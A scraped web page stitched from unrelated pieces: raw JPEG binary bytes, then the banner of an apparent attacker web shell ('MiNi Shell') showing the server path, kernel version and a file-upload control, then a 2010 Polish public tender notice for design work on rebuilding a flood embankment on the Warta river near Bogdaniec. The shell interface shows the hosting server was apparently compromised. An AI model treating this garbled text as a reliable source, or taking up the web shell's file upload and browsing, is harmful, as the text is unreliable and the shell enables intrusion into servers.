JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100906/279114-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: Jasiniec-Roszkowice - przebudowa prawostronnego wału p.pow. rz.Warty
w km wału 32+700 ÷ 39+700 gm. Bogdaniec, woj. lubuskie</b><br>
<b>Numer ogłoszenia: 279114 - 2010; data zamieszczenia: 06.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubuski Zarząd Melioracji i Urządzeń Wodnych w Zielonej Górze Oddział w Gorzowie Wielkopolskim , ul. Myśliborska 52, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7285931, faks 095 7285931.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.lzmiuw.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Jasiniec-Roszkowice - przebudowa prawostronnego wału p.pow. rz.Warty
w km wału 32+700 ÷ 39+700 gm. Bogdaniec, woj. lubuskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowej pn.
Jasiniec-Roszkowice - przebudowa prawostronnego wału p.pow. rz.Warty
w km wału 32+700 ÷ 39+700  gm. Bogdaniec, woj. lubuskie
obejmującej przebudowę istniejącego prawostronnego odcinka wału przeciwpowodziowego rzeki Warty w km wału 32+700 do 39+700. tj. na długości 7,0 km. Przebudowa polegać będzie na: korekcie korony wału , uszczelnieniu skarpy odwodnej i podłoża wału , budowie drogi na koronie / ławie wału , wykonaniu zjazdów i przejazdów w obrębie wału.
 
1. Podstawowy zakres przedmiotu zamówienia obejmuje wykonanie:
-dokumentacji pomiarowej  dla potrzeb wykonania dokumentacji projektowej,
-projektu budowlanego z uwzględnieniem obiektów innych branż opracowany zgodnie z obowiązującymi aktualnie wymogami i przepisami oraz Polskimi Normami , pozwalającymi na uzyskanie pełnych uzgodnień projektu i pozwolenia na budowę. W przypadku zmian w przepisach, pociągających za sobą potrzebę uzyskania nowych decyzji bądź uzgodnień, Wykonawca ma obowiązek ich pozyskania. Dokumentacja projektowa musi uwzględniać wszystkie obowiązki na dzień przekazania jej Zamawiającemu - 5 egz.
	Projekt budowlany powinien zawierać między innymi:
a)	projekt zagospodarowania terenu sporządzony na aktualnej mapie wraz ze wszystkimi uzgodnieniami i opiniami niezbędnymi do uzyskania pozwolenia na budowę. Mapa z zatwierdzeniem Mapa do celów projektowych 
b)projekt architektoniczno-budowlany i wyniki badań geologiczno-inżynierskich oraz geotechniczne warunki posadowienia budowli.
c)wytyczne do planu bezpieczeństwa i ochrony zdrowia,
         Wykonawca winien uzyskać przyjęcie dokumentacji przez Zamawiającego przed ubieganiem się o decyzję o  pozwoleniu na realizację inwestycji (Dz.U. Nr 143  z 2010r. poz.963).


-projektów wykonawczych, uzupełniających i uszczegółowiających projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego oraz realizacji robót budowlanych  - 3 egz.
Projekt wykonawczy powinien zawierać między innymi:
a)część konstrukcyjną przebudowywanego wału,
b)projekt bezpieczeństwa i organizacji ruchu drogowego oraz oznakowania poziomego i pionowego dróg na etapie budowy oraz w układzie docelowym, a także projekty odtworzenia nawierzchni w pasie drogowym ( jeśli będzie wymagany),
c)projekt niezbędnej przebudowy istniejącego układu komunikacyjnego i projekty wpięcia przedmiotowej inwestycji do układu drogowego wraz ze wszystkimi wymaganymi projektami przebudowy infrastruktury i obiektów inżynierskich oraz projektami robót ziemnych ( jeśli będzie wymagany),
d)projekt przebudowy kolizji z istniejącą infrastrukturą techniczną ( sieć wodociągowa, kanalizacyjna, gazowa, elektryczna, telekomunikacyjna, itp.),
e)inne projekty branżowe wynikłe z uzgodnień. 
-specyfikacji technicznej wykonania i odbioru robót budowlanych zawierającej zbiory wymagań niezbędnych dla określenia standardu i jakości wykonania robót, w zakresie wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót - sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004 r. Nr 202 poz. 2072 z 2004 r. ze zm.). STWiORB należy opracować z uwzględnieniem podziału szczegółowego według Wspólnego Słownika Zamówień. Specyfikacja swoim zakresem winna odnosić się do konkretnych rozwiązań przyjętych w projektach ze szczególnym uwzględnieniem parametrów techniczno-jakościowych produktów, materiałów i urządzeń przewidzianych do wbudowania - 3 egz.
-przedmiaru robót -  z odniesieniem do Specyfikacji Technicznej Wykonania i Odbioru Robót (Dz. U. z 2004r. Nr 202 poz. 2072) - 3 egz.
-kosztorysu inwestorskiego z przedmiarem robót ze zbiorczym zestawieniem kosztów opracowanego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130 poz. 1389 ) - 2 egz.
-informacji BIOZ  zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 poz. 1126) - 5 egz. 
przygotowanie niezbędnych materiałów i uzyskanie w imieniu Inwestora  decyzji o  pozwoleniu na realizację inwestycji (Dz.U. Nr 143  z 2010r. poz.963) ,
-operatu wodnoprawnego,  sporządzonego zgodnie z art. 122 ust. 2 pkt. 2 ustawy Prawo wodne wraz z uzyskaniem decyzji wodnoprawnej na wykonanie i eksploatację urządzenia - 3 egz. 
-operatu dendrologicznego na podstawie przeprowadzonej inwentaryzacji gatunkowej drzew i krzewów przewidzianych do wycinki, z dokładnym i czytelnym zaznaczeniem (kolorem i numerem) drzew i krzewów do usunięcia, ze wskazaniem właściciela. Opracowanie należy uzgodnić z właściwymi jednostkami, a inwentaryzacja ma zawierać m.in.: informację o właścicielu lub posiadaczu nieruchomości, na której rosną drzewa i krzewy, nazwę gatunków drzew i krzewów, obwód pnia na wysokości 1,30m, wielkość powierzchni, z której zostaną usunięte krzewy. Wykonawca musi uzyskać w imieniu i na rzecz Inwestora stosowne decyzje dotyczące usunięcia drzew i krzaków zgodnie z art. 82 ust. 3 pkt. 3 oraz art. 85 ust 4 ustawy Prawo wodne - 3 egz.
-wyceny brakarskiej  zawierającej wycenę drewna z podziałem na właścicieli lub posiadaczy nieruchomości, na których rosną drzewa i krzewy przeznaczone do usunięcia. - 3 egz.
-uzyskanie od właścicieli działek oświadczenia na dysponowanie gruntem na cele budowlane oraz zgody na wycięcie drzew i krzewów dla działek związanych z realizacją projektu.
-szacunkowego operatu wywłaszczeniowego dla potrzeb inwestycji z uwzględnieniem kosztów wywłaszczenia i wykupów gruntów bezpośrednio zajętych pod inwestycję - 3 egz.
-uzyskanie informacji o możliwości pozyskania niezbędnej ilości mas ziemnych o właściwych parametrach, z koncesjonowanych najbliższych kopalni kruszywa. Należy  opracować organizację robót związaną z ruchem mas ziemnych, zakres robót uwzględnić w przedmiarach a koszty w kosztorysie inwestorskim.
opracowanie projektowe powinno zawierać dodatkowo między innymi:
- rekultywację terenu w związku z powstałymi szkodami oraz naprawę 
   dróg   dojazdowych,
- projekt organizacji ruchu w zakresie niezbędnym do wykonania robót (ustalenia 
   i  uzgodnienia z właścicielami dróg, itp.),
- wypełnioną Kartę informacyjną zadania wg załączonego wzoru (zał. nr 9 do SIWZ).

 Projekt budowlany a także projekty wykonawcze i STWiORB, kosztorys inwestorski  oraz opracowania towarzyszące winny być opracowane w wersji papierowej w ilości egz. jak wyżej.
         Wykonawca zobowiązany jest również przekazać Zamawiającemu całość opracowania sporządzony w wersji elektronicznej w 1 egz. - płyta CD lub DVD, zawierająca cyfrowy zapis dokumentacji projektowej: rysunki w formacie PDF, tekst w formacie .doc (Ms Word), przedmiar robót i kosztorys inwestorski w formacie .kst lub .ath (Norma) bądź w formacie .doc (Ms Word).
 Ponadto Wykonawca zobowiązany jest do przekazania Zamawiającemu danych cyfrowych w 2 egz.  dot. dokumentacji projektowej w formacie ArcGIS  z prawem do upublicznienia w Systemie Informacji Przestrzennej Dorzecza Odry (SIPDO). 
 
2. Dodatkowe informacje i wymagania:
Wykonawca jest zobowiązany do utrzymania w niezmienionej treści nazwy zadania we wszystkich uzgodnieniach, decyzjach, częściach dokumentacji projektowej i pozwoleniu na realizację inwestycji. 
Dokumentację projektową należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna być ona opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć. Informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych.
Wykonawca przedmiotu zamówienia zobowiązany jest do przedstawiania i uzgadniania z Zamawiającym proponowanych rozwiązań projektowych. 
Wykonawca  zobowiązany jest do zapoznania mieszkańców terenu objętego projektem z propozycjami rozwiązań  (okazanie projektu). 
Obowiązkiem Wykonawcy jest przygotowanie kompletu dokumentów i materiałów, pozwalających na zatwierdzenie projektu budowlanego wraz z uzyskaniem pozwolenia na realizację inwestycji a także wykonanie innych opracowań (w zależności od warunków stawianych przez uzgadniających). Wykonawca zobowiązany jest także przygotować wnioski i materiały a także czynnie włączać się w uzyskiwanie decyzji administracyjnych oraz natychmiastowo uzupełniać wnioski, operaty itp. - na każde wezwanie organów udzielających pozwoleń i Zamawiającego, w celu uzyskania pozwoleń i decyzji administracyjnych, do czasu uzyskania pozwolenia na realizację inwestycji włącznie. 
W okresie wykonania umowy, w celu dokonywania przez strony wzajemnych ustaleń oraz uzgodnień, będą odbywały się z inicjatywy Wykonawcy, nie rzadziej niż raz na kwartał, spotkania konsultacyjne stron w siedzibie Zamawiającego. Pierwsze spotkanie konsultacyjne winno się odbyć nie później niż w okresie jednego miesiąca od daty zawarcia umowy, a w trakcie spotkania Wykonawca powinien przedstawić Zamawiającemu wstępne ustalenia, wnioski z wizji terenowej oraz zarys koncepcji rozwiązań projektowych.
	W trakcie spotkań konsultacyjnych strony uzgodnią między innymi sposób podziału inwestycji na etapy oraz związany z tym sposób opracowania kosztorysów inwestorskich oraz wszelkie 	wymagające uzgodnień kwestie związane z wykonaniem umowy. 
Wykonawca zobowiązany jest do przedstawiania Zamawiającemu comiesięcznego pisemnego meldunku z postępu prac projektowych.
Zaleca się przeprowadzenie wizji lokalnej w terenie w obecności pracownika Oddziału Gorzów Wlkp.  ( po uzgodnieniu jej terminu  -  nr tel. Zespołu Inwestycji Oddziału  (95) 7285 936) oraz uzyskanie na odpowiedzialność i ryzyko Wykonawcy wszelkich istotnych informacji, które mogą być konieczne do przygotowania oferty. Wizję lokalną Wykonawca dokona na swój koszt.
Wykonawca zobowiązany będzie do sprawowania nadzoru autorskiego w toku robót budowlanych wykonywanych w oparciu o opracowaną dokumentację projektową. Na czynność sprawowania nadzoru autorskiego zawarta zostanie odrębna umowa przed rozpoczęciem robót budowlanych. 
Teren planowanej inwestycji znajduje się na obszarze niżej wymienionych form ochrony przyrody: 
  - Natura 2000 Ujście Warty  PLC080001 
              - Obszar Chronionego Krajobrazu  Gorzowsko - Krzeszycka Dolina Warty.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zrealizowali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 projekt budowlany i wykonawczy w zakresie budowy, przebudowy wału przeciwpowodziowego I lub II klasy ważności  o łącznej długości minimum 5,0 km, dla którego uzyskano pozwolenie na budowę. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują co najmniej 3-osobowym zespołem projektantów 
posiadających uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, obejmujące co najmniej projektowanie i sprawowanie nadzoru autorskiego zgodnie z ustawą z dnia 7 lipca 1994 r Prawo budowlane (tekst jednolity Dz. U. z 2006r. Nr 156 poz. 1118 ze zm.) w specjalnościach: konstrukcyjno - budowlanej w zakresie śródlądowych budowli hydrotechnicznych bądź obiektów budowlanych melioracji wodnych lub innymi uprawnieniami odpowiadającymi powyższym, wydanymi na podstawie wcześniej obowiązujących przepisów,  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy są w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiadają środki finansowe lub zdolność kredytową w wysokości minimum 100.000 zł. (słownie: sto tysięcy zł.). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty wg niżej określonych  warunków zmian:
    1) na wniosek Wykonawcy ,  w zakresie zmiany terminu realizacji zamówienia, w przypadku:
